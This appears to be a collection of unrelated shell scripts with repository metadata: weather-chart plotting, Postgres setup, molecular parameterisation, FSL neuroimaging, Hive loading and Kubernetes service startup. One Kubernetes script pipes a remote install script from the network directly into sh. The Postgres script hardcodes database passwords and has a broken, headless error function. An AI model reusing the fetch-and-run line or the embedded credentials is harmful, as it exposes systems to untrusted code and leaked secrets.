# (one <name>lab / <name>dev pair per chart; "dev" is the output GIF).
# NOTE(review): hgtiso500* and hgttmp200* are defined but not referenced
# by the plotting commands below — confirm whether they are still needed.
hgttmp700lab="700MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp700dev="gfs_700_hgt_tmp_nh_anl_${cyc}.gif"
hgttmp500lab="500MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp500dev="gfs_500_hgt_tmp_nh_anl_${cyc}.gif"
hgtiso500lab="500MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso500dev="gfs_500_hgt_iso_nh_anl_${cyc}.gif"
hgtiso300lab="300MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso300dev="gfs_300_hgt_iso_nh_anl_${cyc}.gif"
hgtiso250lab="250MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso250dev="gfs_250_hgt_iso_nh_anl_${cyc}.gif"
hgttmp250lab="250MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp250dev="gfs_250_hgt_tmp_nh_anl_${cyc}.gif"
hgtiso200lab="200MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso200dev="gfs_200_hgt_iso_nh_anl_${cyc}.gif"
hgttmp200lab="200MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp200dev="gfs_200_hgt_tmp_nh_anl_${cyc}.gif"
hgtiso100lab="100MB ANALYSIS HEIGHTS/ISOTACHS"
hgtiso100dev="gfs_100_hgt_iso_nh_anl_${cyc}.gif"
hgttmp100lab="100MB ANALYSIS HEIGHTS/TEMPERATURE"
hgttmp100dev="gfs_100_hgt_tmp_nh_anl_${cyc}.gif"
hgtvor500lab="500MB ANALYSIS HEIGHTS/VORTICITY"
hgtvor500dev="gfs_500_hgt_vor_nh_anl_${cyc}.gif"
hgtvor500usdev="gfs_500_hgt_vor_uscan_anl_${cyc}.gif"
mslpthksfclab="ANALYSIS MEAN SEA LEVEL PRESSURE/1000-500MB THICKNESS"
mslpthksfcdev="gfs_sfc_mslp_thk_nh_anl_${cyc}.gif"
mslpthksfcusdev="gfs_sfc_mslp_thk_uscan_anl_${cyc}.gif"
rhvvel700lab="700MB ANALYSIS RH/VERT VEL"
rhvvel700dev="gfs_700_rh_vvel_nh_anl_${cyc}.gif"
liftlab="ANALYSIS LIFTED INDEX"
liftdev="gfs_lift_nh_anl_${cyc}.gif"
prswshtroplab="TROPOPAUSE PRESSURE/WIND SHEAR"
prswshtropdev="gfs_trop_prs_wsh_nh_anl_${cyc}.gif"
# Set grid date and input file name
gdattim=`echo ${PDY} | cut -c3-8`/${cyc}00F000
gdfile=gem_grids${fhr}.gem
# Execute the GEMPAK program
$GEMEXE/gdplot2_gif << EOF
! 700MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/700_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp700dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp700lab}
l
r
! 500MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/500_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp500dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp500lab}
l
r
! 300MB HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/300_hgt_iso.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgtiso300dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = 1/1/1/1/5;5 !
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso300lab}
l
r
! 250MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/250_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp250dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp250lab}
l
r
! 250MB ANALYSIS HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/250_hgt_iso.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${hgtiso250dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso250lab}
l
r
! 200MB HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/200_hgt_iso.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgtiso200dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = 1/1/1/1/5;5 !
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso200lab}
l
r
! 100MB HEIGHTS/TEMPERATURES
restore $NTS/base_nh.nts
restore $NTS/100_hgt_tmp.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgttmp100dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgttmp100lab}
l
r
! 100MB HEIGHTS/ISOTACHS
restore $NTS/base_nh.nts
restore $NTS/100_hgt_iso.nts
CLEAR = yes
GDFILE = $gdfile
GDATTIM = $gdattim
MAP = 1
DEVICE = gif | ${hgtiso100dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = 1/1/1/1/5;5 !
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/$TITLE
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtiso100lab}
l
r
! ANALYSIS MSLP/1000-500 THICKNESS
restore $NTS/base_nh.nts
restore $NTS/sfc_mslp_thk.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${mslpthksfcdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${mslpthksfclab}
l
r
! ANALYSIS MSLP/1000-500 THICKNESS (US/CANADA)
restore $NTS/base_uscan.nts
restore $NTS/sfc_mslp_thk.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${mslpthksfcusdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${mslpthksfclab}
l
r
! 500MB ANALYSIS HEIGHTS/VORTICITY
restore $NTS/base_nh.nts
restore $NTS/500_hgt_vor.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${hgtvor500dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
MAP = 0
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${hgtvor500lab}
l
r
! 500MB ANALYSIS HEIGHTS/VORTICITY (US/CANADA)
restore $NTS/base_uscan.nts
restore $NTS/500_hgt_vor.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${hgtvor500usdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
TITLE = 1/3/${hgtvor500lab}
l
r
! ANALYSIS LIFTED INDEX
restore $NTS/base_nh.nts
restore $NTS/100_lift.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${liftdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${liftlab}
l
r
! ANALYSIS TROPOPAUSE PRESSURE/WIND SHEAR
restore $NTS/base_nh.nts
restore $NTS/trop_pres_wshr.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${prswshtropdev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${prswshtroplab}
l
r
! ANALYSIS 700MB RELATIVE HUMIDITY AND VERTICAL VELOCITY
restore $NTS/base_nh.nts
restore $NTS/700_rel_vvel.nts
CLEAR = yes
GDFILE = ${gdfile}
GDATTIM = ${gdattim}
MAP = 1
DEVICE = gif | ${rhvvel700dev} | $pixels
TITLE =
TEXT = 1/2/2/c/sw
LATLON = $LATVAL
l
r
CLEAR = no
GDPFUN =
TITLE = 1/-4/${TITLE}
TEXT = 2/2/2/c/sw
LATLON = 0
l
r
TITLE = 1/3/${rhvvel700lab}
l
r
exit
EOF
$GEMEXE/gpend
# Archive the generated GIFs and (optionally) alert the distribution
# system; both steps are gated on the standard SENDCOM/SENDDBN switches.
if [ $SENDCOM = YES ]; then
#   Copy the GIF images into my area
cp ${hgttmp700dev} ${COMOUT}
cp ${hgttmp500dev} ${COMOUT}
cp ${hgtiso300dev} ${COMOUT}
cp ${hgtiso250dev} ${COMOUT}
cp ${hgttmp250dev} ${COMOUT}
cp ${hgtiso200dev} ${COMOUT}
cp ${hgtiso100dev} ${COMOUT}
cp ${hgttmp100dev} ${COMOUT}
cp ${mslpthksfcdev} ${COMOUT}
cp ${mslpthksfcusdev} ${COMOUT}
cp ${hgtvor500dev} ${COMOUT}
cp ${hgtvor500usdev} ${COMOUT}
cp ${liftdev} ${COMOUT}
cp ${prswshtropdev} ${COMOUT}
cp ${rhvvel700dev} ${COMOUT}
#   Copy the GIF images onto the NCDC area on the public ftp server
if [ $SENDDBN = YES ]; then
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp700dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp500dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso300dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso250dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp250dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso200dev}
#    $DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp200dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtiso100dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgttmp100dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${mslpthksfcdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${mslpthksfcusdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtvor500dev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${hgtvor500usdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${liftdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${prswshtropdev}
$DBNROOT/bin/dbn_alert MODEL NCDCGIF ${job} ${COMOUT}/${rhvvel700dev}
#   Convert the 500mb NH Hgts/Temps chart to tif, attach a heading and
#   send to TOC via the NTC
fi
# make_tif.sh reads input/HEADER/OUTPATH from the environment.
export input=${COMOUT}/${hgttmp500dev}
export HEADER=YES
export OUTPATH=$DATA/gfs_500_hgt_tmp_nh_anl_${cyc}.tif
${UTILgfs}/ush/make_tif.sh
fi
msg=" GEMPAK_GIF ${fhr} hour completed normally"
postmsg "$jlogfile" "$msg"
exit
| true |
97aee4a4bf416f7b7db6c94e6b3537ffd8310804 | Shell | baden/navi.cc | /init-scripts/sdk-requirements.sh | UTF-8 | 130 | 2.578125 | 3 | [] | no_license | #!/bin/bash
# Refuse to run without root privileges (the global npm install needs them).
if [[ $EUID -ne 0 ]]; then
   echo "Fail. This script must be run as root." 1>&2
   exit 1
fi
# Install the brunch build tool globally.
npm install -g brunch
| true |
3231cd22f2ea014174752606bb7e392ce9609633 | Shell | ogomez-stratio/test-mavenApp | /environment/containers/deployment/scripts/postgres/scd_nps/create_tables_that_dont_exist_and_add_data.sh | UTF-8 | 2,132 | 4.09375 | 4 | [] | no_license | #!/usr/bin/env bash
# create_tables_that_dont_exist.sh - Creates tables that do not exist
# Luis Rodero Merino - lrodero@stratio.com
##########################
## Variables definition ##
##########################
PROGNAME=$(basename $0)
# Absolute directory containing this script (used to locate the SQL file).
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Connection parameters.  NOTE(review): USER/PASSWD/HOST/PORT/DB/SCHEMA
# are declared here but the create function below hardcodes its own
# connection URI — confirm which set is authoritative.
USER=sanitas
PASSWD=Sanitas2016
HOST=scd-postgresbdc
PORT=5432
DB=sanitasdb
SCHEMA=seguros
MODIFY_ALL=0 # default value
# Optional first argument naming a single table.
# NOTE(review): read here but never referenced later in this script.
TABLE_NAME=$1
##########################
# Functions Area #
##########################
##########################
# DO NOT MODIFY ANYTHING #
# WITHIN THIS AREA #
##########################
{
# ----------------------------------------------------------------
# Function for exit due to fatal program error
# Accepts 1 argument:
# string containing descriptive error message
# ----------------------------------------------------------------
echo "${PROGNAME} - ${1:-"Unknown Error"}" 1>&2
exit 1
}
function test_psql {
# ----------------------------------------------------------------
# Function for testing whether psql command is installed
# ----------------------------------------------------------------
if test -e /usr/bin/psql; then
echo "Psql... OK!"
else
error_exit "There is no Psql client installed"
fi
}
function create {
# ----------------------------------------------------------------
# Function for deleting a table in a remote postgres
# ----------------------------------------------------------------
echo -n "Running create table script and add data Test... "
#sanitas database tables creation
(psql -v ON_ERROR_STOP=1 postgresql://postgres:stratio@scd-postgresbdc:5432/sanitasdb -f $DIR/tables_creation_and_data.sql > /dev/null && echo "OK!") || error_exit "Error creating structure"
echo -n "End create table script... "
}
####################################
# EXECUTION AREA #
####################################
# DANGER ZONE #
# DONT MODIFY ANYTHING BEYOND THIS #
# LINE IF YOU ARE NOT SURE #
####################################
test_psql
create
echo "Finished!!"
| true |
ed9310a56108be7879dcf22bcb1a3c6366160ff5 | Shell | sidneypaulymer/covid-moonshot-designs-spe | /Round1/02_x1093_modifications/01_x1093_extensions/01_antechamber/RUN-antechamber.zsh | UTF-8 | 429 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/bin/zsh
# zsh associative array: compound number (key) -> residue name (value).
declare -A compounds
compounds=( [0072]=S72 [0073]=S73 [0074]=S74 [0075]=S75 [0076]=S76 [0077]=S77 [0080]=S80 [0090]=S90 [0091]=S91 )
# ${(kv)compounds} expands keys and values alternately, so "mol" receives
# the compound number and "id" the residue name on each iteration.
for mol id in ${(kv)compounds}; do
    echo "=== SPE_${mol} :: $id ==="
    # -c bcc charge method, gaff2 atom types, net charge +1, residue
    # renamed to $id, acdoctor checks disabled (-dr no).
    antechamber -i ../SPE_${mol}.mol2 -fi mol2 -o SPE_${mol}a.mol2 -fo mol2 -c bcc -at gaff2 -pf yes -nc 1 -rn $id -dr no
    # Generate any missing force-field parameters for the typed molecule.
    parmchk2 -i SPE_${mol}a.mol2 -f mol2 -o SPE_${mol}.frcmod -s 2
    echo "\n\n"
done
| true |
8a59d7ba31d2405d1008ec6e6b6fb0847caa5256 | Shell | linghuiliu/CosmiTestLCIO | /calice_sim/digitization/digisim/java/.svn/text-base/build.svn-base | UTF-8 | 1,195 | 2.625 | 3 | [] | no_license | #!/bin/sh
# Setup "default" CLASSPATH for JAS3 command-line run on nicadd cluster
#
# 20040525 - GLima - Adapted from Jeremy's script for non-projective .sio
# setup relative dirs using JAS3 app path (JAS3 variable required)
LCIO=/home/lima/work/local/lciodir
JAS3=/home/lima/work/local/jas3dir
JAS3_LIB=$JAS3/lib
JAS3_EXT=$JAS3/extensions
LCD_EXT=$HOME/.JAS3/extensions
# CP: include WD
CLASSPATH=.
# CP: lcio
CLASSPATH=$CLASSPATH:$LCIO/lib/lcio.jar
# CP: libs
CLASSPATH=$CLASSPATH:$JAS3_LIB/freehep-base.jar
CLASSPATH=$CLASSPATH:$JAS3_LIB/jas3.jar
CLASSPATH=$CLASSPATH:$JAS3_LIB/openide-lookup.jar
# CP: extensions
CLASSPATH=$CLASSPATH:$JAS3_EXT/jas3lcd.jar
#CLASSPATH=$CLASSPATH:$LCD_EXT/lcd.jar
#CLASSPATH=$CLASSPATH:$JAS3_EXT/lcd.jar
CLASSPATH=$CLASSPATH:/home/lima/work/jas/hep.lcd/head/lib/lcd.jar
CLASSPATH=$CLASSPATH:$JAS3_EXT/aida.jar
CLASSPATH=$CLASSPATH:$JAS3_EXT/aida-dev.jar
CLASSPATH=$CLASSPATH:$JAS3_EXT/freehep-hep.jar
# export (and print) CP
export CLASSPATH
#echo CLASSPATH=$CLASSPATH
echo javac -sourcepath . @files.lis
#gcj --classpath=$CLASSPATH @files.lis
# Compile all sources listed in files.lis; on success print how to run
# the analysis job.
javac -sourcepath . @files.lis \
 && echo "*** To run java analysis job:" \
 && echo java RawHistos inputfile
| true |
8e3547756b079423488b9e518aba05200909de02 | Shell | slopjong/Questionator | /build-catalog | UTF-8 | 896 | 3.953125 | 4 | [] | no_license | #!/bin/bash
# Build the question catalog JSON from a questionary directory.
# Usage: build-catalog [<catalog directory> <output file>]
# With no arguments the defaults below are used.
generatePerChapter=false
catdir="Biology"
output="catalog.json"

# if only one argument was passed we assume it was -h
if [ $# -eq 1 ];
then
	echo "Usage: build-catalog <catalog directory> <output file>"
	# Fix: actually stop after printing help instead of falling through
	# and building with the defaults.
	exit 0
fi

# if two arguments were passed the first will be the catalog directory
# and the last one the file which should be written to
if [ $# -eq 2 ];
then
	catdir=$1
	output=$2
fi

# convert the files to utf-8 (kept for reference, currently disabled)
#for i in $(ls -1 bio-*/*/*/{answers,questions}.txt);
#do
#	#echo "Processing $i"
#	file $i | grep -v UTF-8 #| cut -d ':' -f 1 | iconv -t utf-8 - | sponge $i
#	#iconv -t utf-8 $i | sponge $i
#done

./generate-json per_chapter="${generatePerChapter}" questionary="${catdir}" catalog_filename="${output}"

# don't reformat if the catalog is generated chapterwise.
# Chained [ ] tests replace the deprecated "-a" operator, and the
# useless "cat | json_reformat" was dropped.
if [ -f "$output" ] && [ "$generatePerChapter" = "false" ];
then
	json_reformat < "${output}" | sponge "${output}"
fi
| true |
0deb14877d3f232ded1d382e513da7d75e714a30 | Shell | shineyr/Shell | /38_break.sh | UTF-8 | 190 | 3.359375 | 3 | [] | no_license | #!/bin/bash
# Demonstrate leaving a for loop early with "break": iterations 1-4 are
# printed, iteration 5 triggers the break before its echo runs.
for var1 in {1..10}
do
    [ "$var1" -eq 5 ] && break
    echo "Iteration number: $var1"
done
echo "The for loop is completed"
| true |
6dc3225fe2a641640e2ecc77981419345f31dd15 | Shell | guitarrapc/dotnet-lab | /database/mssql/entityframework_mssql/sql/entrypoint.sh | UTF-8 | 1,785 | 3.71875 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# Entrypoint helper: wait for SQL Server to accept connections, create
# the schema, then bulk-load the CSV data.  Expects SA_PASSWORD and
# SQLCMDDBNAME in the environment.
database=$SQLCMDDBNAME

# wait for SQL Server to come up, backing off 1..4 seconds between polls
NEXT_WAIT_TIME=1
echo monitoring db server is online.
until /opt/mssql-tools/bin/sqlcmd -P "$SA_PASSWORD" -d master -Q 'select 0'; do
    echo sleep ${NEXT_WAIT_TIME} sec for next interval
    sleep ${NEXT_WAIT_TIME}
    # MEMO: should timeout on 1min or above? if so, should pass crash log to the host for investigation.
    if [ ${NEXT_WAIT_TIME} -ne 4 ]; then
        NEXT_WAIT_TIME=$(( NEXT_WAIT_TIME + 1 ))
    fi
done
echo confirm db server is online.

echo importing data...

# run the init script to create the DB and the tables in /table
/opt/mssql-tools/bin/sqlcmd -P "$SA_PASSWORD" -d master -i ./init.sql

# create tables.  Fix: the glob must be unquoted so it expands to the
# individual .sql files; the original quoted "table/*.sql", making the
# loop run once with the literal pattern and only work by accident via
# later unquoted expansion.
for entry in table/*.sql
do
    echo executing "$entry"
    /opt/mssql-tools/bin/sqlcmd -P "$SA_PASSWORD" -i "$entry"
done

# import the data from the csv files
mkdir -p ./data_conv
for entry in $(find data -name "*.csv")
do
    # i.e: transform /data/MyTable.csv to MyTable
    shortname=$(echo "$entry" | cut -f 1 -d '.' | cut -f 2 -d '/')
    tableName=[$database].[dbo].[$shortname]
    filename="$shortname.csv"

    # convert utf8 to utf16le (BULK INSERT needs UTF-16 input, see below)
    echo converting "$filename" from utf8 to utf16
    # NOTE(review): this cat only echoes the CSV into the container log;
    # presumably a debugging aid — confirm it should stay.
    cat "$(pwd)/data/$shortname.csv"
    iconv -f UTF8 -t UTF16 "$(pwd)/data/$filename" -o "$(pwd)/data_conv/$filename"

    # csv can be both crlf and lf with ROWTERMINATOR 0x0A. dont't use ROWTERMINATOR \n as it force you use crlf for csv.
    # csv must be utf16 encoding. both UTF-16BE and UTF-16LE is available in Bulk Insert. (you don't need to think about bom. )
    # do not add (DATAFILETYPE = 'widechar') as it fail....
    echo importing "$tableName" from "$filename"
    /opt/mssql-tools/bin/sqlcmd -P "$SA_PASSWORD" -Q "BULK INSERT $tableName FROM '$(pwd)/data_conv/$filename' WITH ( FIELDTERMINATOR = ',', ROWTERMINATOR = '0x0A');"
done
| true |
0827f69e7945985324a88e3bd1d9a0a99c185a73 | Shell | marissaschmidt/PaymentAnalysis | /PaymentAnalysis/hive/src/util/generate-load-data-script.sh | UTF-8 | 460 | 3.625 | 4 | [] | no_license | #!/bin/bash
# Generate a Hive load script (load-data-payment.q) that loads every file
# found under <input-dir> (seen through the fuse-dfs mount) into the table
# named by the file's prefix (the text before the first '-').
FUSEDFS_DIR=$HOME/mnt/hdfs/user/$(whoami)

if [ $# -ne 2 ]
then
    echo "Usage: $0 <input-dir> <output-dir>" >&2
    exit 1
fi

inputdir=$1
outfile="$2/load-data-payment.q"

# -f: tolerate the first run, when the output file does not exist yet.
rm -f "${outfile}"
touch "${outfile}"

data=${FUSEDFS_DIR}/${inputdir}
for f in "${data}"/*
do
    file=${f##*/}
    # Table name is the file-name prefix before the first '-'.
    # (A dead, broken `ind=[\`expr index ...\`-1]` line was removed here;
    # it assigned a literal bracketed string and was never used.)
    base=${file%%-*}
    echo "load data inpath '$1/$file'" >> "${outfile}"
    echo "into table $base;" >> "${outfile}"
    echo "" >> "${outfile}"
done
| true |
41a7c1e9915ced351492e64a9b085e2c22bb61ee | Shell | mmantho/bash-fsl-pipeline | /examples/sbfc/rsfc_3_group_multiple_model_feat.sh | UTF-8 | 2,137 | 3.125 | 3 | [] | no_license | #!/bin/bash
# Run a multiple-model group FEAT analysis (seed-based functional
# connectivity) over three subject groups; machine-specific paths are
# selected by WORK_IN_CAB below.
WORK_IN_CAB=0
# ====== init params ===========================
if [ $WORK_IN_CAB -eq 0 ]
then
	GLOBAL_SCRIPT_DIR=/media/data/MRI/scripts
	PROJ_DIR=/media/data/MRI/projects/CAB/fsl_belgrade_early_pd	# <<<<@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
	export FSLDIR=/usr/local/fsl	# change according to used PC
else
	GLOBAL_SCRIPT_DIR=/homer/home/dati/fsl_global_scripts
	PROJ_DIR=/media/Iomega_HDD/MRI/projects/CAB/fsl_belgrade_early_pd	# <<<<@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
	export FSLDIR=/usr/share/fsl/4.1	# change according to used PC
fi
#===============================================
# init_vars.sh defines PROJ_SCRIPT_DIR, PROJ_GROUP_ANALYSIS_DIR,
# MULTICORE_SCRIPT_DIR and related project variables.
. $GLOBAL_SCRIPT_DIR/init_vars.sh $PROJ_DIR
#===============================================
SESS_ID=1
NUM_CPU=1
EXECUTE_SH=$GLOBAL_SCRIPT_DIR/process_group/rsfc_multiple_model_group_feat.sh
# Defines the subject-name arrays used below (arr_controls28, etc.).
. $PROJ_SCRIPT_DIR/subjects_list.sh
INPUT_1stlevel_DIR="roi_right_caud_pall_put_thal_ortho_denoised"
OUTPUT_DIR=$PROJ_GROUP_ANALYSIS_DIR/sbfc/$INPUT_1stlevel_DIR
declare -a arr_fsf_templates=($PROJ_SCRIPT_DIR/glm/templates/groupfeat_ctrl28_treated45_naive21_maskgm )
str_arr_fsf_templates=`echo ${arr_fsf_templates[@]}`
CONTROLS_SUBJ_DIR=/media/data/MRI/projects/CAB/fsl_resting_belgrade_controls/subjects
# create 1st level feat dir list
first_level_feat_paths=""
# Controls live in a separate project tree with a fixed layout.
for SUBJ_NAME in ${arr_controls28[@]}
do
	first_level_feat_paths="$first_level_feat_paths $CONTROLS_SUBJ_DIR/$SUBJ_NAME/s$SESS_ID/resting/fc/feat/$INPUT_1stlevel_DIR"
done
# For patient groups, subject_init_vars.sh derives RSFC_DIR per subject.
for SUBJ_NAME in ${arr_treated45[@]}
do
	. $GLOBAL_SCRIPT_DIR/subject_init_vars.sh
	first_level_feat_paths="$first_level_feat_paths $RSFC_DIR/feat/$INPUT_1stlevel_DIR"
done
for SUBJ_NAME in ${arr_naive21[@]}
do
	. $GLOBAL_SCRIPT_DIR/subject_init_vars.sh
	first_level_feat_paths="$first_level_feat_paths $RSFC_DIR/feat/$INPUT_1stlevel_DIR"
done
#====================================================================================
# Fan the group-FEAT jobs out over NUM_CPU workers and wait for them all.
. $MULTICORE_SCRIPT_DIR/define_thread_processes.sh $NUM_CPU $EXECUTE_SH "$str_arr_fsf_templates" $PROJ_DIR -odp $OUTPUT_DIR -ncope 8 $first_level_feat_paths
wait
echo "=====================> finished processing $0"
| true |
fa3e1f810cddbe59a3a98b95e34eb0997b5f1443 | Shell | gstonge/SIR-benchmark | /generate_networks.sh | UTF-8 | 772 | 2.921875 | 3 | [] | no_license | # Generates the edge lists for the benchmark
#--------------------------------------------
# Number of independent random-graph samples per parameter setting.
NSAMPLE=10
EDGELIST_PATH="dat/edge_lists/"
#generate the gnm networks
# G(n,m) graphs with n = 10^4 nodes and varying edge counts M.
MLIST="50000 150000 500000 1500000 5000000"
for M in $MLIST
do
    for SEED in $(seq 1 $NSAMPLE)
    do
        python generate_random_graph.py gnm 10000 -p $M -s $SEED > $EDGELIST_PATH/gnm_n1E4/m$M\_$SEED.txt
    done
done
#generate the power law networks
# Power-law graphs of varying size N, for exponents 2.25 and 3.0.
NLIST="1000 3000 10000 30000 100000 300000 1000000"
for N in $NLIST
do
    for SEED in $(seq 1 $NSAMPLE)
    do
        python generate_random_graph.py PL $N -p 3 2.25 -s $SEED > $EDGELIST_PATH/power_law_225/n$N\_$SEED.txt
        python generate_random_graph.py PL $N -p 3 3.0 -s $SEED > $EDGELIST_PATH/power_law_300/n$N\_$SEED.txt
    done
done
| true |
0db80c8c0f52c382a249080131cb6329769ec8d0 | Shell | jyao-SUSE-power-group/LinuxAutoShell | /kubernetes_start.sh | UTF-8 | 569 | 2.75 | 3 | [] | no_license | #!/usr/bin/env bash
# usage :
# Restart and enable the kubernetes-related systemd units (plus docker
# and etcd), then smoke-test the cluster with kubectl.
sleep 1;
# List kube* unit names (basename is the 6th '/'-separated path field).
for SERVICES in ` ls /usr/lib/systemd/system/kub* | awk -F '/' '{print $6}' ` docker ; do echo $SERVICES ; done ;
# NOTE(review): this pipes a remote script straight into sh to install
# oh-my-zsh — unrelated to cluster startup and a supply-chain risk;
# confirm it is intentional before keeping it here.
sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" ;
for SERVICES in ` ls /usr/lib/systemd/system/kub* | awk -F '/' '{print $6}' ` docker etcd ; do systemctl restart $SERVICES ; systemctl enable $SERVICES ; systemctl status $SERVICES ; systemctl start $SERVICES ; done ;
echo "sleep 2 s ,wait service loading!"
sleep 2;
## test kubectl
kubectl get nodes ;
| true |
